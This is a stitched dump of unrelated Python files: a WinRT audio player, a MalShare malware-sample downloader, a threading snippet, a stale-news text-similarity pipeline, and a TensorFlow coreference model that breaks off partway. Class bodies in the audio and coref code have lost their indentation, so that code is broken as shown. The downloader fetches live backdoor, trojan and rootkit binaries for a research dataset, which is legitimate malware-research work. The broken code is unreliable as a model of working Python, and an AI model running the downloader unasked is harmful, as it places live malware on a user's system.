    return getattr(Audio, '_stream', None)
def is_stream(self):
    """True when the current source was set via from_stream()."""
    return hasattr(Audio, 'duration')
def stream_end_handler():
    """Poll once a second and fire media_ended when playback reaches the end.

    NOTE(review): defined without `self`; started via
    Thread(target=Audio.stream_end_handler) in from_stream().
    """
    while True:
        if Audio().get_pos() == Audio().get_total():
            Audio().media_ended()
            break
        else:
            time.sleep(1)
def _menu_voices(self, state:bool):
    """Enable (state=True) or deactivate the tray-icon menu entries for
    the audio player."""
    try:
        from libs.LibWin import SysTrayIcon
        if state:
            Audio_voices = ("Play/Pause Audio", None, lambda *args: Audio().play_pause()), ("Close Audio", None, lambda *args: Audio().quit()),
        else:
            Audio_voices = ("Play/Pause Audio", None, SysTrayIcon.Item_Deactivate), ("Close Audio", None, SysTrayIcon.Item_Deactivate),
        for i in Audio_voices:
            SysTrayIcon().EditMenuItemInfo(i[0], i)
    except ImportError:
        # Tray-icon support is optional.
        pass
def _update_display_properties(item):
    """Push Audio.title to the system media overlay as a MUSIC item.

    NOTE(review): defined without `self`; called as Audio._update_display_properties(item).
    """
    from winrt.windows.media import MediaPlaybackType
    props = item.get_display_properties()
    props.type = MediaPlaybackType.MUSIC
    props.music_properties.title = Audio.title
    item.apply_display_properties(props)
async def _play_audio(self, filename, keep_alive: bool = True):
    """Load `filename` (a path string or a winrt MediaSource) and play it.

    When keep_alive is True, block (polling every 2 s) until the playback
    session leaves the NONE state check fails, so the process stays alive
    for the duration of the file.  Raises Audio.FileTypeError for other types.
    """
    from winrt.windows.media.playback import MediaPlaybackItem, MediaPlaybackState
    from winrt.windows.media import core
    from winrt.windows.storage import StorageFile
    import asyncio
    await asyncio.create_task(self.async_initiallize())
    if isinstance(filename, str):
        try:
            file = await StorageFile.get_file_from_path_async(filename)
        except RuntimeError:
            print(filename, 'is not a valid file')
            Audio.title = ''
            return
        Audio.title = file.display_name
        Audio.source = core.MediaSource.create_from_storage_file(file)
    elif isinstance(filename, core.MediaSource):
        Audio.source = filename
        Audio.title = ''
    else:
        raise Audio.FileTypeError('No file was specified!')
    item = MediaPlaybackItem(Audio.source)
    Audio.mediaplayer.source = item
    Audio.mediaplayer.play()
    # BUG FIX: only drop a leftover stream reference when one exists; the
    # unconditional `del Audio._stream` raised AttributeError whenever no
    # stream had ever been played.
    if hasattr(Audio, '_stream'):
        del Audio._stream
    #update the display proprieties
    self._menu_voices(True)
    if keep_alive:
        try:
            session = Audio.mediaplayer.playback_session
            while session.playback_state != MediaPlaybackState.NONE:
                time.sleep(2)
            return
        except RuntimeError:
            return
        except KeyboardInterrupt:
            Audio().quit()
class StopMusic(BaseException):
    """Control-flow exception used to stop the music.

    NOTE(review): derives from BaseException, so a plain `except Exception`
    will not catch it -- confirm this is intentional.
    """
    pass
def quit():
    """Close and destroy the shared media player (no-op when none exists)."""
    try:
        Audio.mediaplayer.close()
        if os.environ.get('DEBUG'):
            print('[DEBUG ] [Media ] Audio player destroyed')
    except AttributeError:
        # Audio.mediaplayer does not exist: the player was never initialised.
        try:
            from kivy.logger import Logger
            Logger.debug('Audio: No media player initiallized, skipping')
        except ImportError:
            pass
def play():
    # Resume playback on the shared player.
    Audio.mediaplayer.play()
def pause():
    # Pause playback on the shared player.
    Audio.mediaplayer.pause()
def play_pause():
    """Toggle between PLAYING and PAUSED; any other state is left alone."""
    try:
        from winrt.windows.media.playback import MediaPlaybackState
        session = Audio.mediaplayer.playback_session.playback_state
        if session == MediaPlaybackState.PLAYING:
            Audio.pause()
        elif session == MediaPlaybackState.PAUSED:
            Audio.play()
        else:
            pass
    except RuntimeError:
        # Player gone / no session: nothing to toggle.
        pass
def play_audio(self, filename, threadded=False):
    """Play an audio file.

    filename: path string or a winrt MediaSource (see _play_audio).
    threadded: when True, return as soon as playback has started instead of
        blocking until it finishes.  NOTE(review): despite the name, no
        extra thread is created here -- it only disables the keep-alive wait.
    Returns True in both cases.
    """
    import asyncio
    #: Union[str, bytes, PathLike[str], PathLike[bytes], IO]
    #: Optional[str]
    if threadded:
        asyncio.run(self._play_audio(filename, False))
        #Logger.debug('Audio: audio started at {}'.format(datetime.now()))
        return True
    else:
        #Logger.debug('Audio: audio started at {}'.format(datetime.now()))
        asyncio.run(self._play_audio(filename))
        return True
def get_pos(self):
    """Current playback position in whole seconds (0 when unavailable)."""
    try:
        ticks = Audio.mediaplayer.playback_session.position.duration
    except RuntimeError:
        return 0
    # TimeSpan counts 100 ns ticks.
    return round(ticks / 10000000)
def set_pos(self, date):
    """Seek to `date`: seconds, or a clock string like 'mm:ss' / 'hh:mm:ss'."""
    if isinstance(date, str):
        # Horner evaluation of the base-60 clock notation.
        seconds = 0
        for part in date.split(':'):
            seconds = seconds * 60 + int(part)
        date = seconds
    from winrt.windows.foundation import TimeSpan
    span = TimeSpan()
    span.duration = int(date) * 10000000
    try:
        Audio.mediaplayer.playback_session.position = span
    except RuntimeError:
        pass
def get_total(self):
    """Total track length in whole seconds, or 0 when unknown."""
    if hasattr(Audio, 'duration'):
        ticks = Audio.duration.duration
    elif hasattr(Audio, 'source') and hasattr(Audio.source.duration, 'duration'):
        ticks = Audio.source.duration.duration
    else:
        return 0
    return round(ticks / 10000000)
def is_playing(self):
    """True while the shared player reports the PLAYING state."""
    try:
        from winrt.windows.media.playback import MediaPlaybackState
        state = Audio.mediaplayer.playback_session.playback_state
        return state == MediaPlaybackState.PLAYING
    except RuntimeError:
        return False
def set_volume(self, volume):
    """Set player volume; accepts 0-1 scalars or 0-100 percentages."""
    if volume > 1:
        volume = volume / 100
    try:
        Audio.mediaplayer.volume = volume
    except AttributeError:
        # No player yet: silently ignore, matching get_volume().
        pass
def get_volume(self):
    """Current player volume on a 0-100 scale (0 when no player exists)."""
    try:
        return 100 * Audio.mediaplayer.volume
    except AttributeError:
        return 0
def bind(self, **kwargs):
    """Attach event handlers, e.g. bind(media_ended=fn).

    Accepted keywords are the names in self.events; any other keyword
    raises KeyError.
    """
    for name, handler in kwargs.items():
        if name not in self.events:
            raise KeyError('"%s" is not an event! Events are: %s' % (name, self.events)) from None
        # BUG FIX (hardening): replaces exec('Audio.{} = kwargs[i]') --
        # setattr is equivalent and avoids executing generated code.
        setattr(Audio, name, handler)
class NotSupportedFile(BaseException):
    """Raised for queue files with an unsupported extension.

    NOTE(review): derives from BaseException (not Exception) -- confirm.
    """
    pass
class FileTypeError(BaseException):
    """Raised when _play_audio receives neither a path nor a MediaSource."""
    pass
# events -- default handlers, replaceable via bind()
def media_ended(self, *args, **kwargs):
    ''' default media_ended handler: tear down the player '''
    Audio.quit()
def source_changed(self, *args, **kwargs):
    ''' default source_changed handler (no-op) '''
    pass
def volume_changed(self, *args, **kwargs):
    ''' default volume_changed handler (no-op) '''
    pass
def playback_state_changed(self, *args, **kwargs):
    ''' default playback_state_changed handler (no-op) '''
    pass
def position_changed(self, *args, **kwargs):
    ''' default position_changed handler (no-op) '''
    pass
class Queue:
    def __init__(self, queue_definition: object, random: bool = True, repeat: int = 0, threadded: bool = False, daemon: bool = None, **t_kwargs) -> None:
        '''
        Play a music Queue
        ==================
        simple usage:
        Select music from a list:
        >>> from audio import Audio
        >>> Audio.Queue(['file1.mp3', 'some\\dir\\file2.mp3'])
        select music from a file:
        >>> from audio import Audio
        >>> Audio.Queue(file.txt or file.json) #see options to know file format
        select music from a folder:
        >>> from audio import Audio
        >>> folder = Audio.Queue.Folder('C:\\Users\\david\\Music\\Dede')
        >>> Audio.Queue(folder)
        options:
        queue_definition:
        the list of file names; must be one of:
        - list
        - file object with .read() support
        - .json file formatted as {"queue":[somefiles]}
        - Queue.Folder object
        random:
        randomly choose the order of audios
        threadded (for advanced users):
        skip the keep-alive wait so the caller retains control of the queue;
        for example, stopping a queue:
        >>> from audio import Audio
        >>> Audio.Queue(['file1.mp3', 'some\\dir\\file2.mp3'], threadded=True)
        >>>
        >>> while True: # <- Leave the process open
        >>> if input() == '': # <- on enter press
        >>> Audio.Queue.quit() #<- do not pass self parameter
        >>> break #<- interrupt the main loop
        other options:
        Audio.Queue.next() play the next song in the list
        Audio.Queue.previous() play the previous song in the list
        '''
        # NOTE(review): repeat, daemon and **t_kwargs are accepted but unused
        # here; `threadded` only toggles keep_alive (no thread is started).
        import asyncio
        asyncio.run(Audio().async_initiallize())
        if threadded:
            asyncio.run(self.play_queue_mp(queue_definition, random, repeat, False))
        else:
            asyncio.run(self.play_queue_mp(queue_definition, random, repeat))
async def play_queue_mp(self, queue_definition: object, random: bool = False, repeat: int = 0, keep_alive: bool = True):
    """Build a MediaPlaybackList from `queue_definition` and play it.

    queue_definition may be a file-like object (newline separated paths),
    a .txt/.json path, a list of paths, or a Queue.Folder.  Only one queue
    may play at a time, guarded by the `queue_playing` environment variable.
    """
    from winrt.windows.media.playback import MediaPlaybackItem, MediaPlaybackList, MediaPlaybackState
    from winrt.windows.media import core, MediaPlaybackType
    from winrt.windows.storage import StorageFile
    # Refuse to start a second concurrent queue.
    try:
        if environ['queue_playing'] == '1':
            try:
                from kivy.logger import Logger
            except ImportError:
                import logging as Logger
            Logger.warning('A queue from automator is already playing. End it to start a new one')
            return
        else:
            environ['queue_playing'] = '1'
    except KeyError:
        environ['queue_playing'] = '1'
    # Normalise queue_definition into a list of file paths.
    try:
        queue = queue_definition.read().split('\n')
    except (IOError, OSError, AttributeError):
        if isinstance(queue_definition, str):
            try:
                suffix = os.path.basename(queue_definition).split('.')[1]
                if not os.path.isfile(queue_definition):
                    raise FileNotFoundError('file {} not found!'.format(queue_definition))
            except IndexError:
                raise Audio.NotSupportedFile('extension is not supported')
            if suffix == 'json':
                from json import load
                # BUG FIX: close the file handle after reading.
                with open(queue_definition, 'r') as fp:
                    queue = load(fp)['queue']
            elif suffix == 'txt':
                with open(queue_definition, 'r') as fp:
                    queue = fp.read().split('\n')
        elif isinstance(queue_definition, list):
            queue = queue_definition
        elif isinstance(queue_definition, self.Folder):
            folder = self.Folder.folder
            queue = [os.path.join(folder, f) for f in os.listdir(folder) if os.path.isfile(os.path.join(folder, f))]
    Audio.Queue._list = MediaPlaybackList()
    Audio.Queue._list.shuffle_enabled = random
    # Resolve a StorageFile for every mp3 entry (removed a leftover
    # `print(dir(...))` debug line here).
    file_list = {}
    for path in queue:
        if path.endswith('mp3'):
            file_list[path] = await StorageFile.get_file_from_path_async(path)
    # Derive "Artist - Title.ext" display metadata from the file name.
    for path, storage_file in file_list.items():
        metas = os.path.basename(path).split(' - ')
        if len(metas) > 1:
            artist = metas[0]
            title = metas[1].split('.')[0]
        else:
            artist = ''
            title = metas[0].split('.')[0]
        _item = MediaPlaybackItem(core.MediaSource.create_from_storage_file(storage_file))
        prop = _item.get_display_properties()
        prop.type = MediaPlaybackType.MUSIC
        prop.music_properties.title = title
        prop.music_properties.artist = artist
        _item.apply_display_properties(prop)
        Audio.Queue._list.items.append(_item)
    Audio.mediaplayer.source = Audio.Queue._list
    Audio.mediaplayer.play()
    Audio()._menu_voices(True)
    if keep_alive:
        try:
            # BUG FIX: re-read playback_state on each iteration; the original
            # captured the state value once, so the loop never terminated.
            session = Audio.mediaplayer.playback_session
            while session.playback_state != MediaPlaybackState.NONE:
                time.sleep(2)
            return
        except (RuntimeError, KeyboardInterrupt):
            Audio().quit()
def next():
    # Skip to the next item in the playback list.
    Audio.Queue._list.move_next()
def previous():
    # Go back to the previous item in the playback list.
    Audio.Queue._list.move_previous()
def pause():
    # Delegate to the shared player.
    Audio.pause()
def play():
    # Delegate to the shared player.
    Audio.play()
def quit():
    # Tear down the shared player; the queue dies with it.
    Audio.quit()
    return
class Folder:
    # Marker type wrapping a directory whose files form the queue.
    # NOTE(review): the path is stored on the class, so every Folder
    # instance shares the most recently constructed path -- confirm.
    folder = None
    def __init__(self, folder) -> None:
        Audio.Queue.Folder.folder = folder
|
malware_downloader.py | """
Malware dataset builder
"""
import time
from requests import get
from bs4 import BeautifulSoup
from threading import Thread
# MalShare search endpoints, one per malware family.
url_backdoor = 'https://malshare.com/search.php?query=backdoor'
url_trojan = 'https://malshare.com/search.php?query=trojan'
url_rootkit = 'https://malshare.com/search.php?query=rootkit'
url_root = 'https://malshare.com/'
# BUG FIX: `key = #insert your API key.` was a SyntaxError (the assignment
# had no right-hand side).  Keep the real key out of source control.
key = ''  # insert your API key.
# Search URL per family.
urls = {
    'backdoor': url_backdoor,
    'trojan': url_trojan,
    'rootkit': url_rootkit
}
# Output directory per family.
folders = {
    'backdoor': 'dataset/malwares/backdoor',
    'trojan': 'dataset/malwares/trojan',
    'rootkit': 'dataset/malwares/rootkit'
}
# Index to resume downloading from, per family.
range_dict = {
    'backdoor': 0,
    'trojan': 0,
    'rootkit': 0
}
def download_data(name, url):
    """Download every sample listed on a MalShare search page.

    name: malware family key into `folders` / `range_dict`.
    url:  MalShare search URL for that family.
    """
    response = get(url)
    html_soup = BeautifulSoup(response.text, 'html.parser')
    # Each result row exposes the sample hash in a td.hash_font cell.
    hash_container = html_soup.find_all('td', class_ = 'hash_font')
    print(name, url, len(hash_container))
    for i in range(range_dict[name], len(hash_container)):
        sample_hash = hash_container[i].string
        path = f'{folders[name]}/{name}_{sample_hash}.bin'
        print(name, i, path)
        api = '/api.php?api_key={}&action=getfile&hash={}'.format(key, sample_hash)
        r = get(url_root + api)
        # BUG FIX: close the output file (the original open(...).write(...)
        # leaked the file handle).
        with open(path, 'wb') as out:
            out.write(r.content)
# Download the three families concurrently, one thread per family.
threads = [
    Thread(target=download_data, args=(family, urls[family]))
    for family in ('backdoor', 'rootkit', 'trojan')
]
for thread in threads:
    thread.start()
# BUG FIX: wait for the downloads to finish instead of spinning forever in
# `while(1): time.sleep(0.1)` -- the script now terminates on its own.
for thread in threads:
    thread.join()
|
threading_simpleargs.py | import threading
def worker(num):
    """Thread worker function: announce which worker is running."""
    print('Worker: ' + str(num))
# Spawn five workers, keeping handles so callers could join them later.
threads = []
for index in range(5):
    thread = threading.Thread(target=worker, args=(index,))
    threads.append(thread)
    thread.start()
|
StaleNewsProcedureMultiprocessing.py | """
This file should implement the procedures detailed in the stale news paper.
Code originally by Christopher Gong,
Optimized by Jonathan Bodine.
Summary:
The methods below apply the stale news procedure outline in the paper
"When Can the Market Identify Stale News? " by Anasteesia Fedyk and James Hodson.
The procedure goes through each article in chronological order from multiple sorted
nml files, checking its similarity with articles about the same company that have
been previously seen by the procedure and are within the last 72 hours. If an article
is about multiple companies, the article will be processed once per company.
A provided similarity test is used, and key similarity information
(DATE_EST, STORY_ID, TICKER, CLOSEST_ID, CLOSEST_SCORE, TOTAL_OVERLAP,
IS_OLD, IS_REPRINT, IS_RECOMB) is written to a csv file.
Optimizations:
Understanding the mere size of the number of articles published in a day,
and the decade long amount of data to be processed in this way, key optimizations
can be made to drastically reduce the time needed to for the procedure. First,
articles are processed one at a time in a getter structure for less memory useage.
Theoretically, the procedure can handle an infinite sequence of articles. Second,
after an article has been processed, only important informaton is kept, in a story
class. Third, the stories related to a company are stored in a linked list in reverse
chronological order. When processing a new article, only the previous 72 hours of
articles are considered, and any older articles will be removed by way of cut
(or prune) of the linked list, to never have more than 72 hours of articles
for a company to be stored. This optimization can be made because the articles
are considered in chronological order.
"""
import xml.etree.ElementTree as ET
import re
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import nltk
from nltk.stem.porter import *
from pytz import timezone
import dateutil.parser
import datetime
import heapq
import numpy as np
import csv
import sys
import os
import time
from multiprocessing import Process, Queue, Pipe, cpu_count
import glob
# All raw news .nml files to process.
fs = glob.glob('data/*.nml')
eastern = timezone('US/Eastern')
# English stop words and a shared Porter stemmer.
stop_words = set(stopwords.words('english'))
stemmer = PorterStemmer()
# Caches: wordDict memoises word -> stem; stemDict appears unused here.
stemDict = dict()
wordDict = dict()
def xmlTreeGetter(filename):
    '''
    Generator yielding one parsed ElementTree per article in an .nml file.
    The file is split on the </doc> tag, which is at the end of every article.
    '''
    # BUG FIX: open the file in a context manager so the handle is closed
    # even when the consumer abandons the generator early.
    with open(filename) as nmlFile:
        text = ""
        for line in nmlFile:
            text += line
            if "</doc>" in line:
                yield ET.fromstring(text)
                text = ""
def article(etree):
    '''Given etree, return the concatenated article body text ('' when absent).'''
    art = etree.find("djnml").find("body").find("text")
    if art is None:
        return ""
    article = ""
    for element in art:
        # Robustness: elements with no text (e.g. an empty <p/>) contribute
        # nothing instead of raising TypeError on None concatenation.
        article += element.text or ""
    return article
def headline(etree):
    '''Given etree, return the headline text.'''
    body = etree.find("djnml").find("body")
    return body.find("headline").text
def tickercreator(etree):
    '''Given etree, return the list of company tickers (possibly empty).'''
    coding = etree.find("djnml").find("head").find("docdata").find("djn").find("djn-newswires").find("djn-mdata").find("djn-coding")
    tik = coding.find("djn-company")
    if tik is None:
        return []
    return [t.text for t in tik]
def accessionNum(etree):
    '''Given etree, return the accession number (the doc's md5 attribute).'''
    return etree.attrib['md5']
def displayDate(etree):
    '''Given etree, return the display-date string.'''
    mdata = etree.find("djnml").find("head").find("docdata").find("djn").find("djn-newswires").find("djn-mdata")
    return mdata.attrib['display-date']
def stem(tokenizedWords):
    """
    Return the set of stemmed words, memoising stems in the module-level
    wordDict cache.
    """
    stems = set()
    for word in tokenizedWords:
        cached = wordDict.get(word)
        if cached is None:
            cached = stemmer.stem(word)
            wordDict[word] = cached
        stems.add(cached)
    return stems
def stop(tokenizedWords):
    """
    Return the input words as a set with stop words removed.
    """
    return {word for word in tokenizedWords if word not in stop_words}
def similaritytest(orig, others):
    """
    Fraction of orig's stemmed words that also appear in any of the stemmed
    articles in `others`.
    """
    combined = set.union(*(story.textWords for story in others))
    overlap = orig.textWords & combined
    return len(overlap) / len(orig.textWords)
def stale(origStory, neighborStories, simtest):
    '''
    Classify the staleness of origStory against its (score, story) neighbors.
    Returns [is_old, is_reprint, is_recomb, total_overlap]; reprint/recomb
    are only decided for stories classified as old.
    '''
    result = [False, False, False, 0]
    if not neighborStories:
        return result
    neighbors = [pair[1] for pair in neighborStories]
    overlap = simtest(origStory, neighbors)
    best_single = neighborStories[0][0]
    result[3] = overlap
    if overlap >= 0.6:
        result[0] = True
        if best_single >= 0.8:
            result[1] = True
        else:
            result[2] = True
    return result
def staleNewsProcedure(ticker, story, companies, simtest):
    '''
    Performs the stale news procedure for one article.  Returns the similarity
    information for this article compared to the articles up to 72 hours prior.
    '''
    companyLL = companies[ticker]
    companyLL.resetCurr()
    compStory = companyLL.nextNode()
    maxpq = []
    while (compStory != None):
        # 259200 s == 72 h.  The list is kept in reverse chronological order,
        # so everything past the first too-old entry can be pruned in one cut.
        if story.displayDate - compStory.displayDate > 259200:
            companyLL.cut();
            break;
        sim = simtest(story, [compStory])
        heapq.heappush(maxpq, (sim, compStory))
        compStory = companyLL.nextNode()
    largestFive = heapq.nlargest(5, maxpq)
    old_reprint_recomb = stale(story, largestFive, simtest)
    # Record this story so later articles can compare against it.
    companies[ticker].addFront(story)
    if (largestFive != []):
        largestacc = largestFive[0][1].accessionNumber
        largestsim = largestFive[0][0]
    else:
        largestacc = None
        largestsim = None
    if (len(largestFive) > 1):
        secondlargestacc = largestFive[1][1].accessionNumber
    else:
        secondlargestacc = None
    # Row layout matches the CSV header written by processor()/merge().
    return [story.displayDate, story.accessionNumber, ticker, len(story.textWords), largestacc, secondlargestacc, largestsim, old_reprint_recomb[3], old_reprint_recomb[0], old_reprint_recomb[1], old_reprint_recomb[2]]
class Story:
    '''A story class.  Holds the per-article fields the procedure needs.'''
    # Class-level defaults, overwritten per instance by __init__/from_other.
    accessionNumber = 0
    displayDate = 0
    tickers = []
    headline = ""
    text = ""
    textWords = set()
    sim = -1
    def __init__(self, et=None):
        """Populate the story by parsing a raw article etree."""
        self.accessionNumber = accessionNum(et)
        self.displayDate = dateutil.parser.parse(displayDate(et)).timestamp()
        self.tickers = tickercreator(et)
        self.text = article(et)
        self.textWords = stop(stem(word_tokenize(article(et))))
        self.headline = headline(et)
    def from_other(self, number, date, tick, txt, s):
        """Populate the story from pre-computed fields (no parsing)."""
        # BUG FIX: was `self.acessionNumber` (typo), which created a stray
        # attribute and left the real accessionNumber untouched.
        self.accessionNumber = number
        self.displayDate = date
        self.tickers = tick
        self.text = txt
        self.sim = s
    def __lt__(self, other):
        # Heap ordering: compare by similarity; ints are allowed on the right.
        if (type(other) == int):
            return self.sim < other
        return self.sim < other.sim
class myLinkedList:
    '''
    Singly linked list with a cursor.  nextNode() advances the cursor one
    element at a time; cut() truncates the list at the cursor so stale
    entries can be dropped cheaply.
    '''
    head = None
    end = None
    curr = None
    def __init__(self):
        # Sentinel head keeps addFront/cut free of empty-list special cases.
        self.head = LLNode("sentinel")
        self.end = self.head
    def addFront(self, val):
        self.head.nextNode = LLNode(val, self.head.nextNode)
    def resetCurr(self):
        self.curr = self.head
    def nextNode(self):
        self.curr = self.curr.nextNode
        if self.curr is None:
            return None
        return self.curr.val
    def cut(self):
        # Drop everything after the cursor.
        self.curr.nextNode = None
class LLNode():
    '''A single list node holding a value and the next link.'''
    val = None
    nextNode = None
    def __init__(self, val=None, nextNode=None):
        self.val = val
        self.nextNode = nextNode
def processor(q, simtest, temp_save):
    """
    Worker that processes a queue of (story, ticker) pairs, appending one
    similarity row per pair to the temp_save CSV.  Terminates when the
    "ad mortem" sentinel ticker is received.
    """
    with open(temp_save, 'w', newline='') as csvfile:
        writer = csv.writer(csvfile, delimiter=',')
        writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
        # Per-ticker history of previously seen stories (72 h window).
        companies = dict()
        while True:
            story, ticker = q.get(block=True)
            if ticker == "ad mortem":
                break
            if ticker not in companies:
                companies[ticker] = myLinkedList()
            p = staleNewsProcedure(ticker, story, companies, simtest)
            writer.writerow(p)
def supplier(pipe, Story):
    """
    Worker that parses raw etrees received on the pipe into Story objects
    and sends them back.  Terminates on the "ad mortem" sentinel.
    """
    while True:
        et = pipe.recv()
        if et == "ad mortem":
            break
        else:
            pipe.send(Story(et))
def merge(endlocation, temp_files):
    """
    K-way merge of per-worker CSV files (each sorted by DATE_EST) into one
    sorted CSV at endlocation.  The temp files are deleted after the merge.
    """
    heap = []
    files = [open(path, 'r') for path in temp_files]
    try:
        readers = {i: csv.reader(f, delimiter=',') for i, f in enumerate(files)}
        # Prime the heap with the first data row of each file.
        for i in range(len(temp_files)):
            next(readers[i])  # discard the per-file header row
            try:
                row = next(readers[i])
            except StopIteration:
                # Robustness: tolerate a worker file with no data rows
                # (the original crashed here).
                continue
            heapq.heappush(heap, (row[0], i, row))
        with open(endlocation, 'w', newline='') as csvfile:
            writer = csv.writer(csvfile, delimiter=',')
            writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
            while heap:
                _, source, row = heapq.heappop(heap)
                writer.writerow(row)
                try:
                    nxt = next(readers[source])
                except StopIteration:
                    nxt = None
                if nxt:
                    heapq.heappush(heap, (nxt[0], source, nxt))
    finally:
        # BUG FIX: close the input handles even if the merge raises.
        for f in files:
            f.close()
    for path in temp_files:
        os.remove(path)
def worker_init(count, t, simtest=None):
    """
    Start `count` worker processes of kind t ("supplier" or "processor").
    Returns (endpoints, processes): parent pipe ends for suppliers, input
    queues for processors.
    """
    workers, worker_processes = list(), list()
    for i in range(count):
        if t == "supplier":
            a, b = Pipe()
            worker = Process(target=supplier, args=((b), (Story)))
            worker.start()
            workers.append(a)
            worker_processes.append(worker)
        elif t == "processor":
            # Each processor writes to its own temp CSV, merged at the end.
            temp_save = f"temp_file_{i}.csv"
            queue = Queue()
            worker = Process(target=processor, args=((queue), (simtest), (temp_save)))
            worker_processes.append(worker)
            worker.start()
            workers.append(queue)
    return workers, worker_processes
def procedure(startlocation = 'data', endlocation='export_dataframe.csv', simtest=similaritytest, worker_count=-1):
    '''
    Performs the procedure over every .nml file under startlocation and
    writes the merged, date-sorted CSV to endlocation.

    worker_count < 0 means "cpu_count() + 1 + worker_count" (so the default
    -1 gives one worker per CPU); the count is then doubled because the
    supplier and processor pools are sized separately.
    '''
    if worker_count < 0:
        worker_count += cpu_count() + 1
    worker_count = worker_count * 2
    location = sorted(glob.glob(startlocation + '/*.nml'))
    # ticker -> index of the processor that owns that ticker's history.
    companies = dict()
    suppliers, supplier_processes = worker_init(worker_count, "supplier")
    processors, processor_processes = worker_init(worker_count, "processor", simtest)
    for f in location:
        print("File processing...", f)
        xtg = xmlTreeGetter(f)
        # Prime every supplier with one raw article.
        for supplier in suppliers:
            try:
                et = next(xtg)
            # BUG FIX: was a bare `except` (swallowed even KeyboardInterrupt);
            # only exhaustion and malformed articles are expected here.
            except (StopIteration, ET.ParseError):
                continue
            supplier.send(et)
        checks, load = 0, 0
        # Round-robin: collect a parsed Story, immediately refill the supplier.
        while checks < len(suppliers):
            for supplier in suppliers:
                if checks >= len(suppliers):
                    break
                story = supplier.recv()
                try:
                    et = next(xtg)
                    supplier.send(et)
                except (StopIteration, ET.ParseError):  # BUG FIX: was bare except
                    checks += 1
                if not (story.tickers == []):
                    for ticker in story.tickers:
                        if '.' in ticker:
                            continue
                        # Pin each ticker to one processor so its 72 h history
                        # lives in a single process.
                        if ticker not in companies:
                            companies[ticker] = load
                            load = (load + 1) % worker_count
                        processors[companies[ticker]].put((story, ticker))
    # Shut the pools down with the "ad mortem" sentinels, then merge.
    [a.send("ad mortem") for a in suppliers]
    [w.join() for w in supplier_processes]
    [q.put((None, "ad mortem")) for q in processors]
    [w.join() for w in processor_processes]
    merge(endlocation, [f"temp_file_{i}.csv" for i in range(worker_count)])
    print('Procedure finished')
if __name__ == '__main__':
    start = time.time()
    if len(sys.argv) == 3:
        procedure(sys.argv[1], sys.argv[2])
        print(time.time() - start)
    else:
        # BUG FIX: tell the user how to invoke the script instead of exiting
        # with nothing but a timing number.
        print('usage: python StaleNewsProcedureMultiprocessing.py <start_dir> <end_csv>', file=sys.stderr)
        print(time.time() - start)
        sys.exit(1)
coref_model_ad.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# -*-encoding:utf-8-*-
import os
import operator
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
import h5py
import util
import coref_ops
import conll
import metrics
import tools
import re
NUM = re.compile(r'\d{4}')
class CorefModel(object):
def __init__(self, config):
    """Build the TF-1 training graph: embedding lookups, a padded input
    queue, the prediction/loss ops, an FGM adversarial loss on the top span
    embeddings, and the optimizer (60/40 mix of base and adversarial loss).
    """
    self.config = config
    self.context_embeddings = util.EmbeddingDictionary(config["context_embeddings"])
    self.head_embeddings = util.EmbeddingDictionary(config["head_embeddings"], maybe_cache=self.context_embeddings)
    self.char_embedding_size = config["char_embedding_size"]
    self.char_dict = util.load_char_dict(config["char_vocab_path"])
    self.max_span_width = config["max_span_width"]
    self.genres = {g: i for i, g in enumerate(config["genres"])}
    # Optional pre-computed language-model (e.g. ELMo) embedding cache.
    if config["lm_path"]:
        self.lm_file = h5py.File(self.config["lm_path"], "r")
    else:
        self.lm_file = None
    self.lm_layers = self.config["lm_layers"]
    self.lm_size = self.config["lm_size"]
    self.eval_data = None  # Load eval data lazily.
    # One (dtype, shape) spec per tensor fed through the padding FIFO queue.
    input_props = []
    input_props.append((tf.string, [None, None]))  # Tokens.
    input_props.append((tf.float32, [None, None, self.context_embeddings.size]))  # Context embeddings.
    input_props.append((tf.float32, [None, None, self.head_embeddings.size]))  # Head embeddings.
    input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers]))  # LM embeddings.
    input_props.append((tf.int32, [None, None, None]))  # Character indices.
    input_props.append((tf.int32, [None]))  # Text lengths.
    input_props.append((tf.int32, [None]))  # Speaker IDs.
    input_props.append((tf.int32, []))  # Genre.
    input_props.append((tf.bool, []))  # Is training.
    input_props.append((tf.int32, [None]))  # Gold starts.
    input_props.append((tf.int32, [None]))  # Gold ends.
    input_props.append((tf.int32, [None]))  # Cluster ids.
    input_props.append((tf.int32, [None]))  # sentence_start.
    input_props.append((tf.int32, [None]))  # sentence_end.
    self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
    dtypes, shapes = zip(*input_props)
    queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
    self.enqueue_op = queue.enqueue(self.queue_input_tensors)
    self.input_tensors = queue.dequeue()
    self.predictions, self.loss, self.top_list = self.get_predictions_and_loss(*self.input_tensors)
    """adversarial train, used FGM"""
    self.top_embed, top_ids, top_scores, top_speaker, genre_emb_r, k_r = self.top_list
    self.copy_top_embed = tf.identity(self.top_embed)
    with tf.name_scope('ad') as scope:
        self.ad_loss = self.adversarial_loss(self.copy_top_embed, top_ids, top_scores, top_speaker, genre_emb_r, k_r)
        # FGM perturbation: normalized gradient of the adversarial loss,
        # treated as a constant (stop_gradient) and added to the embeddings.
        gradients_r = tf.gradients(self.ad_loss, self.copy_top_embed, aggregation_method=tf.AggregationMethod.EXPERIMENTAL_ACCUMULATE_N)
        gradients_r = tf.stop_gradient(gradients_r)
        norm = tf.norm(gradients_r)
        r = gradients_r / norm
        self.copy_top_embed = self.copy_top_embed + r
    self.global_step = tf.Variable(0, name="global_step", trainable=False)
    self.reset_global_step = tf.assign(self.global_step, 0)
    learning_rate = tf.train.exponential_decay(self.config["learning_rate"], self.global_step,
                                               self.config["decay_frequency"], self.config["decay_rate"],
                                               staircase=True)
    trainable_params = tf.trainable_variables()
    # Combined objective: 60% base loss + 40% adversarial loss.
